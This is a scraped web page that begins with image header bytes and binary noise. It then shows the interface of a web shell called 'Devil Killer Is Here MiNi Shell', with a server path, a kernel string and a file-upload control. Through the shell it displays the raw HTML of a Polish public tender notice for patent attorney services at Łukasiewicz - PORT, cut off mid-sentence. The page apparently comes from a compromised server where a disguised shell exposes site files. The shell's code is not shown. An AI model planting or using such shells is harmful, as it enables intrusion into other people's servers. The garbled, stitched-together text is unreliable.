JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231228/0057680601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług rzecznika patentowego na potrzeby Łukasiewicz - PORT w ramach Wirtualnego Instytutu Badawczego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sieć Badawcza Łukasiewicz - PORT Polski Ośrodek Rozwoju Technologii</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020671635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stabłowicka 147</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-066</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">joanna.oczkowicz@port.lukasiewicz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.port.org.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Badania naukowe i rozwojowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług rzecznika patentowego na potrzeby Łukasiewicz - PORT w ramach Wirtualnego Instytutu Badawczego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c93dc7c3-9d8e-11ee-953e-c2ea26915e21</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00576806</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/port <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/port</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie PZP, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną .<br/>10.2.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy PZP, podmiotowe środki dowodowe, pełnomocnictwa, sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenia o jakich mowa w pkt. 7.1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>10.3.Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać wymogi Rozporządzenia Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014.<br/>10.4.	W przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>10.5.Komunikacja Wykonawcy z Zamawiającym oraz przekazywanie informacji, oświadczeń, wniosków, zawiadomień i dokumentów odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość”, dostępnej pod adresem https://platformazakupowa.pl/pn/port lub poczty elektronicznej Zamawiającego wskazanej w pkt. 10.6 SWZ. <br/>10.6.	Osoba upoważniona przez Zamawiającego do kontaktowania <br/>się z Wykonawcami: Joanna Oczkowicz: joanna.oczkowicz@port.lukasiewicz.gov.pl <br/>10.7. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>10.8. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8)	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty, wynosi 150MB, natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <p class="mb-0">angielski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PO.271.114.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług prawnych w zakresie zarządzania ochroną własności intelektualnej, w szczególności uzyskania ochrony patentowej oraz ochrony know-how, jak również świadczenie usług strategicznego doradztwa w obszarze ochrony własności intelektualnej na rynkach krajowych oraz zagranicznych dla Wirtualnego Instytutu Badawczego zarządzanego przez Zamawiającego - Sieć Badawczą Łukasiewicz - PORT Polski Ośrodek Rozwoju Technologii w zakresie nauk z dziedziny Biotechnologii Medycznej ze szczególnym uwzględnieniem technologii mRNA. <br/>Zamawiający posiada zapotrzebowanie na Przedmiot Umowy na podstawie umowy o zarządzanie Wirtualnym Instytutem Badawczym z dnia 16 października 2020 r., bowiem działa jako podmiot zarządzający w rozumieniu ustawy z dnia 4 kwietnia 2019 r. o wspieraniu działalności naukowej z Funduszu Polskiej Nauki, działając na rzecz Skarbu Państwa - Ministra Nauki i Szkolnictwa Wyższego&#34;.<br/>Szczegółowy opis przedmiotu zamówienia wraz z wymaganiami Zamawiającego względem przedmiotu zamówienia, zostały określone w załączniku nr 2 do SWZ – Opis Przedmiotu Zamówienia, załączniku nr 10 do SWZ – Formularz wyceny oraz załączniku nr 3 do SWZ - wzór umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79120000-1 - Usługi doradztwa w zakresie patentów i praw autorskich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega, że szacowane maksymalne ilości przedmiotu zamówienia zostały określone w załączniku nr 10 do SWZ – Formularzu wyceny. Szacowane wartości mają charakter maksymalny a Zamawiający posiada możliwość dostosowania liczby zleceń w ramach powyżej wskazanych kategorii do swoich aktualnych potrzeb z uwzględnieniem zapisów wzoru umowy na podstawie składanych zamówień. Zamawiający zastrzega, że może zwiększać ilości godzin/sztuk z danych pozycji formularza wyceny, z zastrzeżeniem, że nie może zostać przekroczona maksymalna wartość umowy przy składaniu zamówień. <br/>Zamawiający zastrzega, że wartością gwarantowaną jaką Zamawiający wykorzysta w trakcie trwania umowy jest 10 % wynagrodzenia brutto umowy. Przedmiot Umowy będzie realizowany na podstawie zamówień składanych pocztą elektroniczną przez osobę upoważnioną zgodnie z Umową. Pozostałe 90 % wynagrodzenia brutto umowy może zostać wykorzystane zgodnie z zapotrzebowaniem Zamawiającego w ramach prawa opcji wielokrotnie według potrzeb Zamawiającego. Realizowanie prawa opcji będzie wykonywane na podstawie oświadczenia woli Zamawiającego (w formie pisemnej, za pomocą poczty elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) wykonanego przez Zamawiającego nie później niż do upływu 46 miesiąca trwania Umowy a Wykonawca będzie zobligowany podjąć się jego realizacji w ramach Umowy. Po upływie terminu, o którym mowa w zdaniu poprzedzającym prawo opcji wygasa. Realizacja opcji będzie odbywała się w oparciu o ceny jednostkowe (stawki) określone w Formularzu wyceny zał. Nr 10 do swz i w Umowie oraz na zasadach określonych w Umowie. Nie skorzystanie przez Zamawiającego z prawa opcji nie rodzi po stronie Wykonawcy żadnych roszczeń względem Zamawiającego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówienia, o których mowa w art. 214 ust. 1 pkt 7 PZP.<br/>Zamawiający przewiduje możliwość udzielenia zamówienia polegającego na powtórzeniu podobnych usług do przedmiotu zamówienia, na podstawie art. 214 ust. 1 pkt. 7 PZP, do kwoty w wysokości: 1.000.000 zł netto, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zgodnie z zapisami w OPZ stanowiącymi zał. nr 2 do SWZ</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki dotyczące zdolności technicznej lub zawodowej:<br/>1) Zamawiający wymaga, aby Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, posiadał doświadczenie w zakresie:<br/>a)	wykonał co najmniej 5 usług w zakresie opracowania strategii ochrony własności intelektualnej z dziedziny Biotechnologii Medycznej ze szczególnym uwzględnieniem technologii mRNA. Poprzez opracowanie strategii ochrony własności intelektualnej Zamawiający rozumie opracowanie planu działań mających na celu uzyskanie jak najszerzej ochrony Praw własności intelektualnej i know-how oraz ich egzekwowanie, przy czym istotne jest aby Wykonawca uwzględnił aspekty geograficzne i technologiczne oraz na bieżąco współpracował z Zamawiającym, aby celowo uzyskać jak najszersze zabezpieczenie praw własności intelektualnej, a Strategia określała m. in. analizę możliwych sposobów ochrony, wskazanie optymalnych rozwiązań, oszacowanie kosztów, określenie jurysdykcji itd.<br/>b)	wykonał co najmniej 1 usługę w zakresie ochrony praw własności intelektualnej przynajmniej dla jednego przedsiębiorstwa z branży biotechnologicznej lub farmaceutycznej, którego przychód raportowany wg. Międzynarodowych standardów* osiągnął przynajmniej 500 mln USD w jednym z pięciu ostatnich lat lub firma pozyskała przynajmniej 100 mln USD inwestycji z funduszy wysokiego ryzyka (Venture Capital).<br/>*Przez metodę weryfikacji przychodu albo pozyskania kapitału Zamawiający rozumie:<br/>o	Podmiot publikował raporty finansowe zgodnie z Międzynarodowymi Standardami Sprawozdawczości Finansowej (MSSF) lub amerykańskimi Ogólnie Przyjętymi Zasadami Rachunkowości (US GAAP),<br/>o	Podmiot regularnie poddawał swoje sprawozdania finansowe corocznemu badaniu przez renomowaną firmę audytorską i publikował je zgodnie z obowiązującymi przepisami,<br/>o	Podmiot był notowany na giełdzie papierów wartościowych i publikował swoje wyniki finansowe zgodnie z wymogami danego rynku regulowanego,<br/>o	Podmiot regularnie raportował i udostępniał opinii publicznej swoje wyniki finansowe, które podlegały niezależnemu audytowi zgodnie z powszechnie przyjętymi standardami rachunkowości,<br/>o	Podmiot publikował zbadane przez audytora sprawozdania finansowe, pozwalające na weryfikację osiąganych przychodów;<br/>c)	wykonał co najmniej 4 usługi w zakresie analizy FTO dla wynalazków z obszaru Biotechnologii Medycznej, z czego przynajmniej 1 usługa w zakresie analizy dla technologii opartej na mRNA;<br/>d)	reprezentował klientów prowadzących działalność w obszarze Biotechnologii Medycznej, z czego przynajmniej dwóch przedsiębiorców przed właściwym sądem, w co najmniej 3 postępowaniach sądowych z zakresu ochrony praw własności intelektualnej (np. unieważnienie lub naruszenie praw do patentu, prowadzonych w krajach takich jak USA lub Chiny lub Japonia lub Niemcy lub Wielka Brytania lub Francja lub Włochy);<br/>e)	wykonał co najmniej 5 raportów z badania stanu techniki w dziedzinie Biotechnologii Medycznej, w tym przynajmniej 2 z zakresu technologii mRNA;<br/>f)	prowadził co najmniej 5 postępowań w procedurze międzynarodowej zgodnie z Układem o współpracy patentowej (ang. Patent Cooperation Treaty, PCT) w dziedzinie Biotechnologii Medycznej na rzecz przedsiębiorców, z wyłączeniem świadczenia usług dla uczelni i instytutów badawczych;<br/>g)	prowadził postępowania przed Amerykańskim urzędem patentowym (ang. United States Patent and Trademark Office, USPTO) zakończone udzieleniem patentu dla co najmniej 5 zgłoszeń na rzecz przedsiębiorców, z wyłączeniem zgłoszeń dla uczelni i instytutów badawczych;<br/>h)	prowadził postępowania przed urzędem patentowym Chińskiej Republiki Ludowej (SIPO) zakończone udzieleniem patentu dla co najmniej 5 zgłoszeń na rzecz przedsiębiorców, z wyłączeniem zgłoszeń dla uczelni i instytutów badawczych;<br/>i)	wykonał co najmniej 5 usług w zakresie zgłoszeń patentowych przed EPO, zakończonych przyznaniem patentu dla co najmniej 3 zgłoszeń na rzecz przedsiębiorców, z wyłączeniem świadczenia usług dla uczelni i instytutów badawczych;<br/>2 Zamawiający wymaga, aby Wykonawca dysponował następującymi osobami skierowanymi do realizacji przedmiotu zamówienia: co najmniej 3 osoby, które będą posiadały następujące kwalifikacje zawodowe, wykształcenie i doświadczenie, z tym że jedna osoba może posiadać kilka z poniższych:<br/>a)	co najmniej 1 osoba, która wykonywała usługi z zakresu ochrony praw własności intelektualnej na rzecz przedsiębiorców z branży biotechnologicznej lub farmaceutycznej, którzy są notowani na giełdzie i których przychód jest/był na poziomie co najmniej 500 mln USD w roku kalendarzowym w którym są/były świadczone usługi;<br/>b)	co najmniej 1 osoba, która przeprowadziła proces składania przynajmniej 2 aplikacji patentowych na rzecz przedsiębiorców w procedurze międzynarodowej zgodnie z Układem o współpracy patentowej w dziedzinie Biotechnologii Medycznej (ang. Patent Cooperation Treaty, PCT);<br/>c)	co najmniej 1 osoba, która przeprowadziła proces składania aplikacji patentowych na rzecz przedsiębiorców ukończonych uzyskaniem przynajmniej 5 patentów przed USPTO lub SIPO lub EPO;<br/>d)	co najmniej 1 osoba, która prowadziła proces składania aplikacji patentowych z zakresu technologii opartych o mRNA zakończonych uzyskaniem przynajmniej 2 patentów na rzecz przedsiębiorców przed USPTO lub SIPO lub EPO;<br/>e) co najmniej 1 osoba posiadająca doświadczenie w minimum 3 procesach sądowych w zakresie ochrony praw własności intelektualnej (np. unieważnienia lub naruszenia praw do patentu) przed sądami właściwymi w krajach takich jak Stany Zjednoczone lub Chiny lub Japonia lub Niemcy lub Francja lub Wielka Brytania lub Włochy;<br/>f)	co najmniej 2 osoby posiadające uprawnienia europejskiego rzecznika patentowego (tj. zdały europejski egzamin kwalifikacyjny EQE), z czego przynajmniej jedna osoba z minimum dwuletnim doświadczenia w pracy jako rzecznik patentowy;<br/>g)	co najmniej 2 osoby posiadające wykształcenie biotechnologiczne (wykształcenie wyższe 2 stopnia, tytuł magistra lub równoważny);<br/>h)	co najmniej 1 osoba podsiadająca tytuł doktora w obszarze biotechnologii medycznej (wykształcenie wyższe 3 stopnia, tytuł doktora lub równoważny);<br/>3 Szczególny, obiektywnie uzasadniony sposób spełnienia przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>UWAGA: Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej w zakresie doświadczenia (ust. 1 powyżej) nie dopuszcza łącznego spełniania warunku przez Wykonawców tzn. co najmniej jeden z Wykonawców powinien spełniać warunek zdolności technicznej lub zawodowej w pełnym zakresie (nie dotyczy dysponowania osobami spełniającymi określone warunki), z zastrzeżeniem, że chodzi o dany warunek określony w punktach od a)-i). Każda z pozycji (litery a)-i) traktowana jest jako oddzielny warunek. W odniesieniu do konkretnego warunku Wykonawcy wspólnie ubiegający się o zamówienie mogą polegać na zdolnościach tego z Wykonawców, który wykona usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3 PZP). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia stanowi załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz wykonanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz 